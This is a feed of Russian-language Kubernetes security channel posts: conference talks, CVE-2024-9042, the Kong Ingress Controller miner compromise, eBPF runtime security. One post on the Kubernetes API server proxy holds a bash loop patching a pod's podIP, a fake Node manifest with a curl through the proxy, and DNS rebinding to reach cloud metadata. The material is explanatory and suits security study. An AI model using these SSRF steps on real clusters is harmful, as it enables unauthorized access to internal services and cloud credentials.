Когда-то мы рассказывали на канале о таком ресурсе как
Сегодня мы хотим поделиться
Однако, по правде сказать – ничего особенного, этакая замена привычному поиску по сайту.
HackTricks
. Там был раздел, посвященный Kubernetes Security
, однако потом он переехал на отдельный ресурс HackTricks Cloud.Сегодня мы хотим поделиться
AI Assistant
от создателя этих ресурсов – HackTricks Assistant. По сути это чат-бот, который натренирован на информации с HackTricks. В том числе, по Kubernetes Security
.Однако, по правде сказать – ничего особенного, этакая замена привычному поиску по сайту.
👍10🔥4🥰2❤1
Стали доступны записи выступлений с KubeCon + CloudNativeCon India 2024. Полный плейлист можно найти тут (это под 100 видео). Отдельно отметим доклады:
- A Deep Dive Into the Current Runtime Security Landscape
- Tutorial: Flatcar Container Linux Deep Dive: Deploying, Managing, and Automating Workloads Securely
- Enhance Kubernetes Security with the Common Expression Language (CEL)
- A Deep Dive Into the Current Runtime Security Landscape
- Tutorial: Flatcar Container Linux Deep Dive: Deploying, Managing, and Automating Workloads Securely
- Enhance Kubernetes Security with the Common Expression Language (CEL)
👍9🔥3💩2
Сегодня вновь затронем тему
Автор рассматривает две функции –
Самое интересное, что даже не нужны сертификаты
Если говорить про перформанс, то такой способ даёт оверхед, хоть и всего 0.2 мкс. Кроме того, средняя нагрузка на процессор, создаваемая каждым хуком, выглядит следующим образом: 0,1% для
eBPF
, а точнее observability
зашифрованного трафика с помощью этой технологии – статья "What Insights Can eBPF Provide into Real-Time SSL/TLS Encrypted Traffic and How?" как раз об этом.Автор рассматривает две функции –
SSL_write()
для записи данный (используется для перехвата данных, записанных клиентом, но еще не зашифрованных) и SSL_read()
для чтения данных из SSL
соединения. Эта функция позволяет перехватить расшифрованные данные, а также разобрать код ответа.Самое интересное, что даже не нужны сертификаты
TLS/SSL
для расшифровки или шифрования трафика. Это позволяет наблюдать за протоколом приложения как до шифрования, так и после расшифровки.Если говорить про перформанс, то такой способ даёт оверхед, хоть и всего 0.2 мкс. Кроме того, средняя нагрузка на процессор, создаваемая каждым хуком, выглядит следующим образом: 0,1% для
uprobe/SSL_write*
, 0,007% для uprobe/SSL_read*
и 0,3% для uretprobe/SSL_read
. Замеры проводились на 1000 запросах для каждого HTTP
метода.👍12🔥5
Простая и понятная визуализация на тему как выбрать соответствующий
О том что
Ну и вообще не только
Distroless
образ от Google
для вашего приложения.О том что
distroless
бывают разные мы писали тут. И не забываем что там не все идеально - об этом писали тут ;)Ну и вообще не только
Google
такое делает. И вообще можно это делать своими руками.🔥27👍7❤5🤮2🙏1👌1
Первая конференция в 2025-ом году, которая зацепила наше внимание –
В докладе авторы рассказывают много чего интересного – затрагивают проблемы
Также в докладе был упомянут новый инструмент Seccomp-Diff, который может сравнивать
ShmooCon 2025
. Там было много интересных докладов, в том числе там был доклад и про Kubernetes Security
– "A Commencement into Real Kubernetes Security (Jay Beale and Mark Manning)".В докладе авторы рассказывают много чего интересного – затрагивают проблемы
system call filtering system
, приводящие к TOCTOU
, говорят про инструменты для генерации и управления seccomp
профилями в Kubernetes, показывают демо работы с инструментами peirates
и KubeHound
(1, 2).Также в докладе был упомянут новый инструмент Seccomp-Diff, который может сравнивать
Seccomp
профили двух контейнеров и подсвечивать наиболее опасные системные вызовы. Может работать как CLI
, так и через веб-приложение.👍12🔥3❤1
Сегодня мы вам рекомендуем изучить статью "Building Container Images FROM Scratch: 6 Pitfalls That Are Often Overlooked" (Иван продолжай в том же духе ;)). Название говорит само за себя. Все с наглядными примерами проблем и их решениями.
👍29🥰4❤3🔥3
Вышло очередное новое видео из серии
Kubernetes Security Fundamentals
от Rory McCune
. Это видео про Authentication
, а вернее о том как работает аутентификация учетных записей сервисов в Kubernetes
. Видео доступно по ссылке тут.YouTube
Kubernetes Security Fundamentals: Authentication - Part 3
In this video we’ll continue looking at how Kubernetes handles authentication with a look at service account token authentication. If you’d like more information please see our security labs post https://securitylabs.datadoghq.com/articles/kubernetes-security…
👍13🔥4❤2
Начнем эту неделю со статьи "Reproducing CVE-2024-9042: Command Injection in Windows Kubernetes Nodes" про CVE-2024-9042, которая описывается вендором: Command Injection affecting Windows nodes via nodes/*/logs/query API. Ключевые моменты:
- Только
- Должен быть включен
-
-
- Позволяет выполнять команды на всех
Вот как-то само собой так получается, что когда мы рассказываем [1,2] про
P.S. Кто-нибудь
- Только
Windows
- Должен быть включен
NodeLogQuery feature gate
(по умолчанию сейчас выключен и эту ручку упоминали тут) -
pattern
параметр этой фичи напрямую передается в Powershell
без фильтрации-
command injection
любым пользователем и service account
с правами GET
на nodes/logs
- Позволяет выполнять команды на всех
Windows
нодах от NTAuthority\system
Вот как-то само собой так получается, что когда мы рассказываем [1,2] про
Kubernetes
в Windows
мире, это обязательно про какие-то баги. И при этом эти баги не проходные, а которые действительно могут быть очень полезны атакующему.P.S. Кто-нибудь
Kubernetes
кластера на Windows
держит или игрался с ними?Amberwolf
Reproducing CVE-2024-9042: Command Injection in Windows Kubernetes Nodes
AmberWolf Security Research Blog
👍7🔥3
Сегодняшним постом продолжаем тематику наступательной безопасности в
Наверняка вы знаете, что
Очевидно, что
Бага 2019 года (упоминали про неё на канале тут), но она всё еще работает. Всё что нужно – это перезаписать
Если у вас есть возможность создавать
Эксплуатация уязвимости типа
Про эти и другие способы использования
Kubernetes
, а именно – рассмотрим механизм Proxy
в Kubernetes API Server
. Наверняка вы знаете, что
Kubernetes API Server
может выступать в качестве HTTP
-прокси сервера, позволяя пользователям с соответствующими правами (create nodes/proxy, pods/proxy
) получить доступ к Nodes
или Pods
.Очевидно, что
kubectl proxy
позволяет по сути экспулатировать SSRF
, поэтому рассмотрим несколько интересных способов использования этой функциональности:1) Проксирование на адреса вне кластера
Бага 2019 года (упоминали про неё на канале тут), но она всё еще работает. Всё что нужно – это перезаписать
IP
адрес в поле status
в манифесте Pod
, а затем проксировать запросы на этот адрес. Однако, это может вызвать некоторые сложности, т.к Kubernetes
распознает это изменение как ошибку и изменяет значение на действительный IP
-адрес, поэтому вам придется зацикливать запросы, чтобы сохранить его установленным на нужное вам значение:
#!/bin/bash
set -euo pipefail
readonly PORT=8001
readonly POD=echoserver
readonly TARGETIP=1.1.1.1
while true; do
curl -v -H 'Content-Type: application/json' \
"http://localhost:${PORT}/api/v1/namespaces/default/pods/${POD}/status" >"${POD}-orig.json"
cat $POD-orig.json |
sed 's/"podIP": ".*",/"podIP": "'${TARGETIP}'",/g' \
>"${POD}-patched.json"
curl -v -H 'Content-Type:application/merge-patch+json' \
-X PATCH -d "@${POD}-patched.json" \
"http://localhost:${PORT}/api/v1/namespaces/default/pods/${POD}/status"
rm -f "${POD}-orig.json" "${POD}-patched.json"
done
2) SSRF через Fake Node
Если у вас есть возможность создавать
Nodes
, то в манифесте достаточно указать желаемый адрес, для того чтобы проксировать туда запросы:
kind: Node
apiVersion: v1
metadata:
name: fakegoogle
status:
addresses:
- address: www.google.com
type: Hostname
curl http://127.0.0.1:8001/api/v1/nodes/http:fakegoogle:80/proxy/
3) CVE-2020-8562 – Обход blacklist
Эксплуатация уязвимости типа
TOCTOU
, на данный момент не имеющей патча, будет особенно интересна, если вы находитесь в окружении облачного провайдера без возможности делать запросы на 169.254.169.254
. Прибегнув к известной технике для эксплуатации SSRF
– DNS rebinding
можно обойти это ограничение, для этого, например, можно воспользоваться сервисом rebinder.Про эти и другие способы использования
kubectl proxy
рассказал Rory McCune
в своей статье "Exploring the Kubernetes API Server Proxy".👍15❤5🔥3🥰2
На Хабре вышла наша статья "Безопасность Kubernetes-кластеров: вредные советы или bullshit bingo", которая по сути является текстовым представлением нашего выступления с
DevOpsConf 2024
. В общем, для тех кому ближе текст, а не видео. И как всегда задавайте любые вопросы в комментариях!Хабр
Безопасность Kubernetes-кластеров: вредные советы или bullshit bingo
Как погубить кластер, действуя во благо? Подборка вредных советов из реальных кейсов и опыта от специалиста по безопасности контейнеров и Kubernetes. Вместе установим антивирус на ноды, просканируем...
👍20🔥12❤5
Неприятная история случилась с
1) 28 августа 2024 года разработчики из
2) 25 ноября 2024 года они получают анонимный отчет от исследователя безопасности о том, что их репозиторий подвержен атаке Pwn request. После этого мейнтейнеры провели ротацию всех секретов в репозитории и вернули триггерное событие обратно на
3) Спустя почти два месяца, а именно 23 декабря 2024 года атакующие начали разведку – они получили доступ к секретам, в том числе к персональному токену доступа
4) Примерно через 22 часа – 24 декабря злоумышленники перешли на основной репозиторий с полученным на предудыщем шаге
5) 29 декабря 2024 года 4 пользователя отметили в
6) 2 января 2025 мейнтейнеры подтвердили, что образ был скомпрометирован, а вунтри него содержался
Более подробно о всей ситуации можно почитать в блоге
Kong Ingress Controller
в конце прошлого года – в прод попал образ, содержащий в себе майнер XMRig
. Таймлайн происходящего был таков:1) 28 августа 2024 года разработчики из
Kong
исправляют свои пайплайны меняя pull_request
на pull_request_target
2) 25 ноября 2024 года они получают анонимный отчет от исследователя безопасности о том, что их репозиторий подвержен атаке Pwn request. После этого мейнтейнеры провели ротацию всех секретов в репозитории и вернули триггерное событие обратно на
pull_request
. Но только для главной ветки. Так что старые неиспользуемые ветки продолжили использовать pull_request_target
, а значит были уязвимы.3) Спустя почти два месяца, а именно 23 декабря 2024 года атакующие начали разведку – они получили доступ к секретам, в том числе к персональному токену доступа
GitHub
, проэксплуатировав уязвимость в одном из репозиториев.4) Примерно через 22 часа – 24 декабря злоумышленники перешли на основной репозиторий с полученным на предудыщем шаге
access token
. Они запушили образ docker.io/kong/kubernetes-ingress-controller
на Dockerhub
с тегом 3.4
.5) 29 декабря 2024 года 4 пользователя отметили в
issue
на GitHub
, что запуск Kong Ingress Controller
приводит к аномально высокой нагрузке на ЦП.6) 2 января 2025 мейнтейнеры подтвердили, что образ был скомпрометирован, а вунтри него содержался
XMRig
.Более подробно о всей ситуации можно почитать в блоге
KIC
тут. Также было опубликовано YARA правило для обнаружения таких нагрузок.GitHub
Unauthorized image of Kong Ingress Controller v.3.4.0
### Summary
On December 23, 2024, an unauthorized image of Kong Ingress Controller v.3.4.0 (hash: `sha256:a00659df0771d076fc9d0baf1f2f45e81ec9f13179f499d4cd940f57afc75d43`) was uploaded to DockerH...
On December 23, 2024, an unauthorized image of Kong Ingress Controller v.3.4.0 (hash: `sha256:a00659df0771d076fc9d0baf1f2f45e81ec9f13179f499d4cd940f57afc75d43`) was uploaded to DockerH...
🔥28😨11👍8❤2🤓2🥰1😐1
Замечательная статья "Runtime Security and the Role of eBPF/BPF-LSM", которая достаточно понятно объясняет как работает настоящий
В качестве подопытных рассматриваются
У нас в Luntry есть функциональность для обнаружения, реагирование со сбором артефактов, предотвращения на базе
Более детально мы сравнивали различные
prevention
(предотвращение) в Linux
с помощью eBPF
. В качестве подопытных рассматриваются
Falco
, Tetragon
и KubeArmor
- все с разными подходами к реализации. Первые два не дают никакого предотвращения, а только реагирование. Falco
из user space
отправляет kill
сигнал, а tetragon
из kernel space
отправляет bpf_send_signal()
. Это характерно не только им, но и всем реализациям, которые опираются не на Linux Security Modules (LSM)
. И если вам рассказывают/заявляют обратное, то вам попросту врут.У нас в Luntry есть функциональность для обнаружения, реагирование со сбором артефактов, предотвращения на базе
AppArmor
(он опирается на LSM
) и уже на подходе собственная реализация предотвращения на базе eBPF-LSM
.Более детально мы сравнивали различные
security runtime
-решения в вебинаре "Runtime Security: на вкус и цвет все фломастеры разные".👍16❤4🔥2🥰1
Проект
Аудиторы из
Краткую выжимку всех находок можно почитать в блоге
Notary
(еще один проект, помимо Cosign
, для подписи и верификации артефактов) прошел второй security audit
.Аудиторы из
Quarks Lab
в своем отчете отразили 11 findings
, 2 из которых уже присвоили CVE
:CVE-2024-56138: Time stamp signature generation lacks certificate revocation check
CVE-2024-51491: Process crash during CRL-based revocation check on OS using separate mount point for temp Directory
Краткую выжимку всех находок можно почитать в блоге
Quarks Lab
тут, а полный отчет в репозитории Notary
тут.👍11🔥3🤡2❤1
13 февраля на ТБ Форуме пройдет доклад Анатолия Карпенко, инженера по автоматизации Luntry, на тему “Основы анализа СЗИ в контейнерном исполнении с помощью Luntry”.
За достаточно небольшой временной интервал мы с вами пройдем путь от полного неведения о попавшем нам в руки для анализа СЗИ в контейнерном исполнении, до полного понимания, что это за средство, как оно устроено и насколько все хорошо у него с безопасностью.
В рамках доклада:
- Узнаем, как можно быстро понять исследуемое приложение с точки зрения его компонентов и активности;
- Разберемся, на какие аспекты образов контейнеров стоит обращаться внимание с точки зрения информационной безопасности;
- Поднявшись на уровень выше, углубимся в свойства безопасности на уровне контейнеров и
- На каждом этапе остановимся на рекомендациях по исправлению и улучшению уровня безопасности контейнерного приложения.
За достаточно небольшой временной интервал мы с вами пройдем путь от полного неведения о попавшем нам в руки для анализа СЗИ в контейнерном исполнении, до полного понимания, что это за средство, как оно устроено и насколько все хорошо у него с безопасностью.
В рамках доклада:
- Узнаем, как можно быстро понять исследуемое приложение с точки зрения его компонентов и активности;
- Разберемся, на какие аспекты образов контейнеров стоит обращаться внимание с точки зрения информационной безопасности;
- Поднявшись на уровень выше, углубимся в свойства безопасности на уровне контейнеров и
YAML
файлов, описывающих их в Kubernetes
.- На каждом этапе остановимся на рекомендациях по исправлению и улучшению уровня безопасности контейнерного приложения.
🔥11👍6❤2🥰2
Благодаря посту выше мы вышли на статью "The (Anti-)EDR Compendium" и решили сами обдумать действительно насколько это схоже с тем, что можно наблюдать в контейнерном мире, в
Основные моменты, которые хотелось бы подсветить:
1) Чем больше детектирующей логики на агенте/сенсоре, тем больше влияние на производительность и вообще возможность обработать большой поток сообщений (упираемся в лимиты и дропы). В контейнерном Мире все ухудшается тем, что там в большинстве своем высоконагруженные приложения и они генерируют большое количество событий, не под стать пользовательской машине. На пример мы встречали кейсы, где порождалось по
2) Сложные анализы на агенте/сенсоре — это всегда большие оверхеды. В разделе "Performance Impact" рассматривается ситуация сканирование памяти и файлом антивирусным движком. Как я думаю вы уже догадались это дорого! И это очень плохо влияет на систему контейнеризации (привет
Есть еще много общего и это мы рассматривали в вебинаре "Runtime Security: на вкус и цвет все фломастеры разные".
Kubernetes
при работе runtime security
решений агентской природы (то, что ставится на Node
и мониторит происходящее там).Основные моменты, которые хотелось бы подсветить:
1) Чем больше детектирующей логики на агенте/сенсоре, тем больше влияние на производительность и вообще возможность обработать большой поток сообщений (упираемся в лимиты и дропы). В контейнерном Мире все ухудшается тем, что там в большинстве своем высоконагруженные приложения и они генерируют большое количество событий, не под стать пользовательской машине. На пример мы встречали кейсы, где порождалось по
100тыщ
процессов в секунду (и это явно не предел, а с сетевыми может быть и еще хуже ситуация)! И чем больше там правил, тем больше времени и ресурсов надо чтобы это разобрать.2) Сложные анализы на агенте/сенсоре — это всегда большие оверхеды. В разделе "Performance Impact" рассматривается ситуация сканирование памяти и файлом антивирусным движком. Как я думаю вы уже догадались это дорого! И это очень плохо влияет на систему контейнеризации (привет
overlayfs
) и об этом и говорит документация docker
. Иначе это приведет к сбоям в работе контейнерных приложений.Есть еще много общего и это мы рассматривали в вебинаре "Runtime Security: на вкус и цвет все фломастеры разные".
👍8🔥4❤2
Напоминаем, что идет прием заявок на доклады на конференцию БеКон 2025!
Если мы на предыдущие конференции только приглашали докладчиков из наших клиентов, друзей и партнеров, на конкретные темы, то сейчас появляется возможность предложить свою тему самостоятельно ;)
Требования к заявке:
- Продолжительность доклада — не более 25 минут
- Тема по безопасности контейнеров и
- Выступление рассчитано на технических специалистов
- Доклад актуален и основан на личном опыте
- Доклад ранее нигде не был представлен
- Доклад глубоко раскрывает тему и имеет практическое применение
Заявки принимаются до 31 марта! Сама конференция будет в начале июня.
Если мы на предыдущие конференции только приглашали докладчиков из наших клиентов, друзей и партнеров, на конкретные темы, то сейчас появляется возможность предложить свою тему самостоятельно ;)
Требования к заявке:
- Продолжительность доклада — не более 25 минут
- Тема по безопасности контейнеров и
Kubernetes
- Выступление рассчитано на технических специалистов
- Доклад актуален и основан на личном опыте
- Доклад ранее нигде не был представлен
- Доклад глубоко раскрывает тему и имеет практическое применение
Заявки принимаются до 31 марта! Сама конференция будет в начале июня.
🔥9❤1👍1🤩1
Занимательный материал "Migrating from Istio to Linkerd". Ранее подобного не встречал, а при этом последние наверное полгода - год вопросы про
А как у вас отношение к
Linkerd
от друзей и клиентов мы получаем. Так что эта статья будет как раз в тему. При этом там и про механизмы безопасности не забыли в разделе "Migrating authorization policy".А как у вас отношение к
Linkerd
?)www.buoyant.io
Migrating from Istio to Linkerd
In this guide we'll walk you through a task that is increasingly common in the Kubernetes space: migrating an existing Istio deployment to Linkerd.
👍14🔥2❤1
Вышла очередная статья из цикла
В начале автор рассказывает про так называемые
В конце, автор приводит манифест для поднятия демо-стенда.
Kubernetes security fundamentals
от Rory McCune, на этот раз про Networking.В начале автор рассказывает про так называемые
Network trust zones
, а потом представляет CNI
, сетевые политики и способы управления ими. В конце, автор приводит манифест для поднятия демо-стенда.
👍16🔥4👏2
В одном из своих прошлых постов мы уже упоминали доклад "Commencement into Real Kubernetes Security" от Jay Beale и Mark Manning с конференции ShmooCon 2025 и там делали акцент на релизе инструмента Seccomp-Diff. А сегодня хочется сделать акцент на самом докладе, потому что он просто великолепный и мысли авторов во многих моментах совпадают с нашими (которые мы рассказываем в наших выступлениях). Приятно что у мировых звезд индустрии такой же взгляд ;)
И так:
- Видео выступления
- Слайды выступления
- Демо из выступления (Взлом
И в шапке поста несколько шедевральных слайдов, там таких много, поэтому презентация MUST SEE! На самом деле прям хочется сделать отдельный стрим с разбором данной преза - настолько там много всего хорошего)
И так:
- Видео выступления
- Слайды выступления
- Демо из выступления (Взлом
CIS
соответствующего кластера без CVE
- для многих это идеал)И в шапке поста несколько шедевральных слайдов, там таких много, поэтому презентация MUST SEE! На самом деле прям хочется сделать отдельный стрим с разбором данной преза - настолько там много всего хорошего)
🔥16
Kubernetes Netowrk Policies Done the Right Way by Isovalent.pdf
7.9 MB
Инженеры из
Из этой книги вы узнаете:
- Что такое
- Про разные подходы к использованию сетевых политик, управление ими, и их конфигурацию
- Про принятие принципа
Экземпляр книги прикладываем во вложении к посту.
Cilium
опубликовали книгу Kubernetes Network Policies Done the Right Way
.Из этой книги вы узнаете:
- Что такое
NetworkPolicy
, какова их роль в обеспечении безопасности workloads, и как преодолеть проблемы с их внедрением- Про разные подходы к использованию сетевых политик, управление ими, и их конфигурацию
- Про принятие принципа
Zero Trust
, использование Hubble
для повышение observability
Экземпляр книги прикладываем во вложении к посту.
👍34🔥17❤2👎1